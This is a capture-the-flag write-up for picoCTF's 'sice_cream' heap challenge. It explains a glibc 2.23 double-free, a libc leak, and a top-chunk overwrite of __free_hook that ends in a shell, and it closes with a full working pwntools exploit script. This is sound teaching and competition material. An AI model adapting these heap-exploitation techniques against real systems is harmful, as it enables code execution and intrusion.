---
name: sice_cream
points: 500
category: pwn
author: ewn10
---

Let's take inventory: we have a stripped binary and libc version 2.23. Some
reverse engineering reveals a program similar to Ghost Diary where we can make
allocations (up to size 0x58) and write to the newly allocated memory (though
not independently of each other this time) and can free what we allocated (but
the pointers are never reset back to `null`). We've also got a buffer for the
name that we can work with, which lands in the memory immediately before the
array of pointers (this is important). No off-by-one overflows this time around,
but careful inspection reveals what looks an awful lot like a win
function---there's a function which takes in a file name as an argument, and
dumps the contents of that file to stdout. However, since we need to pass a
string to it, it's not particularly useful since the string `flag.txt` is
nowhere in the program, and so we may as well just call `system("/bin/sh")`
instead of bothering with that function (we'll need a libc leak anyways to get
code execution from a heap vulnerability).

We start with the obvious double-free, which lets us add an arbitrary address to
a fastbin list. Since the name buffer is right below the list of pointers, we
can create a fake chunk such that `malloc` will return a pointer to the start of
this array---allowing us to change its contents to whatever we want. This means
we can also call `free` on whatever address we want, so we can free a fake
smallbin-sized chunk that we create within the name buffer to get a libc address
written into our name buffer. The function for reading back in the name does not
append any null bytes, and also prints the string back for us, so we can print
out this libc address and calculate our base address.

Also, that same memory leaking technique allows us to leak a heap address---by
filling the name up entirely, we will end up printing the first pointer
allocated, which gets us our heap address; however we don't need it for this
exploit (it's in the code anyways).

Since we control the pointers we free, we can set up a double-free now without
needing to allocate anything, since we can create fake chunks on the name
buffer. This allows us to create a function to clear (almost) the entire
allocation list while only needing 4 allocations available, so we can now
allocate as many times as we want without running out of slots. Unfortunately I
couldn't figure out how to avoid leaving one pointer still remaining, and also
we leave 2 more pointers to set up the double-free the next time we want to
clear the list, so we only get 13 usable slots back---still more than enough for
any single operation, after which we can run this clear function (`clear_slots`
in the exploit code) again.

Now, we just need to overwrite a hook to print the flag. We first tried
overwriting `__malloc_hook`, which ended up being quite challenging since we
couldn't allocate chunks of size 0x70---if only we could allocate strings one
byte longer... Instead, we worked around it by finding a location in libc that
was a size that we could allocate, and found a spot with quadword 0x40 that was
below `__malloc_hook`. From there, we wrote a new size (0x60) at the end of each
region we could write to, so we can repeat the process and eventually end up
writing to `__malloc_hook` (and bombing all the memory in between with garbage,
but apparently there's nothing too important there because we don't crash). In
the exploit, this is implemented in `jump_overwrite()`. We didn't think to check
whether or not this would be useful though before starting on this, which wasted
us quite a lot of time (and might have cost us global 3rd place, who knows).
None of the one gadgets in libc would work, so we had to find a different
approach (though if you were more creative like redpwn, you might have
discovered that triggering `malloc_printerr` to get called would then end up
calling the hook with constraints met for one of the gadgets---we sure didn't).

Instead, we overwrote the `top_chunk` pointer in the malloc main area to the
nearest non-zero value in memory below `__free_hook`. This allowed us to keep
allocating chunks off the wilderness (which was now under our target address)
until we got a chunk that did overlap, and then write our value to
`__free_hook`. Since the hook gets called with the argument to `free`, and we
can already call `free` on any memory address we want, we can thus call
`system("/bin/sh")`---the structure of the pointer clearing code meant we
already had a pointer pointing to the name buffer, so we stuck our string there.
By freeing that pointer, we get a shell and our flag.

## Full exploit

```python
#!/usr/bin/env python2
from pwn import *
import itertools

context.binary = './sice_cream'

libc = ELF('./libc.so.6')

if False:
    p = connect('2019shell1.picoctf.com', 35993)
else:
    p = context.binary.process(aslr=True)

g_name = 0x00602040

libc_leapfrog_offs = 0x3c41e1
win_fn = 0x00400cc4

slot_counter = 0
SLOT_MAX = 20
slot_hole = []

def create(size, contents):
    global slot_counter
    global slot_hole
    if slot_counter >= SLOT_MAX:
        raise RuntimeError('Out of slots')
    if size > 0x58:
        raise ValueError('Allocation too large')
    slot = slot_counter
    slot_counter += 1
    if slot_counter in slot_hole:
        slot_counter += 1
    log.debug('Creating size {:x} @ {}'.format(size, slot))
    p.sendlineafter('Exit\n> ', '1')
    p.sendlineafter('?\n> ', str(size))
    p.sendafter('?\n> ', contents)
    return slot

def free(slot):
    log.debug('Freeing slot {}'.format(slot))
    p.sendlineafter('Exit\n> ', '2')
    p.sendlineafter('?\n> ', str(slot))

def slot_info():
    log.info('{} slots used ({} remaining)'.format(slot_counter, SLOT_MAX-slot_counter-len(slot_hole)))

def set_name(name):
    p.sendlineafter('Exit\n> ', '3')
    p.sendafter('?\n> ', name)
    p.recvuntil('like ')
    return p.recvuntil('!\n1. Buy', drop=True)

# Clobbers - slots (duh), name
# Slots 0, 1 pointing to chunks g_name, g_name+0x10
# Uses 0x60 size fastbin
def clear_slots():
    # slot_info()
    global slot_counter
    global slot_hole
    if slot_counter > SLOT_MAX - 4:
        raise RuntimeError('Too many used chunks to clear')
    with log.progress('Clearing slots'):
        name_data = bytearray('\0'*0x100)
        name_data[0x08:0x10] = p64(0x61) # chunk_sz prev_inuse
        name_data[0x18:0x20] = p64(0x61) # chunk_sz prev_inuse
        name_data[0x68:0x70] = p64(0x21) # fake chunk_sz
        name_data[0x78:0x80] = p64(0x21) # fake chunk_sz
        name_data[0xf8:    ] = p64(0x61)
        assert len(name_data) == 0x100
        set_name(str(name_data))
        free(0)
        free(1)
        free(0)
        create(0x58, p64(g_name+0xf0))
        create(0x58, 'b'*8)
        create(0x58, 'a'*8)
        p_slots = create(0x58,
            p64(g_name+0x10) + # 0
            p64(0x61) + # 1 (fake chunk_sz)
            p64(g_name+0x20) + # 2
            '\0'*(0x58 - 8 - 0x18) + p64(0x61) # lower slots cleared
        )
        slot_counter = 3
        # bin state: +0x20
        free(0)
        free(2)
        # bin state: +0x20 -> +0x10 -> +0x20
        create(0x58, p64(g_name+0xf0 + 0x58))
        create(0x58, 'b'*8)
        create(0x58, 'a'*8)
        p_slots = create(0x58, '\0' * 0x58) # clear upper slots
        # bin state: (unusable)
        free(0)
        free(2)
        free(0)
        create(0x58, p64(g_name+0xf0))
        create(0x58, 'b'*8)
        create(0x58, 'a'*8)
        # set slot 0, clear lower slots
        p_slots = create(0x58, p64(g_name+0x10) + '\0'*(0x58-8))
        slot_counter = 1
        set_name('\0'*0x18 + p64(0x61) + p64(0))
        slot_hole = [11]
        create(0x58, 'c'*8) # pop last chunk off fastbin

# Uses a valid fastbin chunk at start to leapfrog over memory (filling with
# nulls) and eventually write data at target
#
# Optional end arg sets up a new fastbin chunk of size end, function returns
# address of this chunk
#
# chainstart is the sizes of the first couple bins of the chain
def jump_overwrite(start, target, data, end, chainstart):
    # check doesn't work most of the time but whatever
    if len(data) > 0x58 or (len(data) > 0x50 and end is not None):
        raise ValueError('Too much data')
    addr = start
    jump_chunk_lens, jcl_peekn = itertools.tee(itertools.chain(chainstart, itertools.repeat(0x60)))
    last_jump_len = None
    next(jcl_peekn)
    for jump_chunk_len in jump_chunk_lens:
        log.info('@{:016x}'.format(addr))
        if addr + jump_chunk_len > target:
            last_jump_len = jump_chunk_len
            break
        next_jump_chunk_len = next(jcl_peekn)
        name_data = bytearray('\0'*0x100)
        name_data[0x08:0x10] = p64(jump_chunk_len | 1) # chunk_sz prev_inuse
        name_data[0x18:0x20] = p64(jump_chunk_len | 1) # chunk_sz prev_inuse
        name_data[0x08+jump_chunk_len:0x10+jump_chunk_len] = p64(0x21) # fake chunk_sz
        name_data[0x18+jump_chunk_len:0x20+jump_chunk_len] = p64(0x21) # fake chunk_sz
        name_data[0xf8:    ] = p64(0x61)
        assert len(name_data) == 0x100
        set_name(str(name_data))
        free(0)
        free(1)
        free(0)
        chunk_usable_sz = jump_chunk_len - 0x8
        create(chunk_usable_sz, p64(addr))
        create(chunk_usable_sz, 'b'*8)
        create(chunk_usable_sz, 'a'*8)
        create(chunk_usable_sz,
            '\0' * (chunk_usable_sz - 8) + # null fill
            p64(next_jump_chunk_len) # chunk_sz
        )
        addr += jump_chunk_len - 0x8
        if slot_counter > 10:
            clear_slots()
    name_data = bytearray('\0'*0x100)
    name_data[0x08:0x10] = p64(last_jump_len | 1) # chunk_sz prev_inuse
    name_data[0x18:0x20] = p64(last_jump_len | 1) # chunk_sz prev_inuse
    name_data[0x08+last_jump_len:0x10+last_jump_len] = p64(0x21) # fake chunk_sz
    name_data[0x18+last_jump_len:0x20+last_jump_len] = p64(0x21) # fake chunk_sz
    name_data[0xf8:    ] = p64(0x61)
    assert len(name_data) == 0x100
    set_name(str(name_data))
    free(0)
    free(1)
    free(0)
    chunk_usable_sz = last_jump_len - 0x8
    create(chunk_usable_sz, p64(addr))
    create(chunk_usable_sz, 'b'*8)
    create(chunk_usable_sz, 'a'*8)
    target_offs = target - addr - 0x10
    assert target_offs + 0x8 < chunk_usable_sz
    chunk_data = bytearray('\0' * chunk_usable_sz)
    chunk_data[target_offs:target_offs+len(data)] = data
    if end != None:
        chunk_data[-0x8:] = p64(end)
    assert len(chunk_data) == chunk_usable_sz
    if end == None:
        chunk_data = chunk_data[:target_offs+0x08]
    create(chunk_usable_sz, str(chunk_data))
    if end != None:
        return addr + last_jump_len - 0x8

name_data = bytearray('\0'*0x100)
name_data[0x08:0x10] = p64(0xd1) # chunk_sz prev_inuse
name_data[0xd8:0xe0] = p64(0x21) # chunk_sz prev_inuse
name_data[0xf8:    ] = p64(0x21) # top fake chunk_sz
name_data = str(name_data)

assert len(name_data) == 0x100

p.sendafter('name?\n> ', 'A')
with log.progress('Leaking heap address'):
    ca = create(0x10, 'A' * 8)
    heap_base = u64(set_name('A'*0x100)[0x100:].ljust(8, '\0')) - 0x10
    set_name(name_data)
log.success('Heap base: 0x{:016x}'.format(heap_base))
with log.progress('Executing double free'):
    cb = create(0x10, 'B' * 8)
    free(ca)
    free(cb)
    free(ca)
with log.progress('Overwriting slot 0'):
    ca2 = create(0x10, p64(g_name + 0xf0))
    cb2 = create(0x10, 'b'*8)
    ca3 = create(0x10, 'a'*8)
    # overwrite slot 0 and 1
    pca = create(0x10, p64(g_name + 0x10) + p64(g_name + 0x20))
libc_base = None
with log.progress('Leaking libc'):
    free(0)
    binhead = u64(set_name('A' * 0x10)[0x10:].ljust(8, '\0'))
    libc_base = binhead - 0x3c4b78
libc.address = libc_base
log.success('libc@0x{:016x}'.format(libc_base))
with log.progress('Cleaning up'):
    set_name(name_data[:0x10]) # restore chunk header
    create(0x58, 'Z') # use up most of the chunk
    create(0x58, 'Z') # use up most of the chunk
clear_slots()
slot_info()
# bad fastbins: 0x20 size
with log.progress('Preparing fastbinsY'):
    name_data = bytearray('\0'*0x50)
    name_data[0x08:0x10] = p64(0x40 | 1) # chunk_sz
    name_data[0x48:0x50] = p64(0x21) # fake chunk_sz
    assert len(name_data) == 0x50
    set_name(str(name_data))
    free(0)
# bad fastbins: 0x20, 0x40 size
clear_slots()
with log.progress('Overwriting top chunk'):
    jump_overwrite(
        libc.symbols['__malloc_hook'] + 0x22,
        libc.symbols['__malloc_hook'] + 0x68,
        p64(libc.symbols['__free_hook']-0xb58),
        None,
        [0x60]
    )
with log.progress('Allocating to __free_hook'):
    to_go = 0xb40 # -0x10 for metadata size
    while to_go >= 0x58:
        create(0x58, '\0')
        to_go -= 0x60
        if slot_counter > 10:
            clear_slots()
    set_name('A'*0x10 + '/bin/sh\0')
    # overwrite __free_hook
    create(0x58, 'C' * (to_go + 8) + p64(libc.symbols['system']))

p.sendlineafter('Exit\n> ', '2')
p.sendlineafter('?\n> ', '0') # free a pointer to within name pointing to '/bin/sh\0'

p.interactive()
```
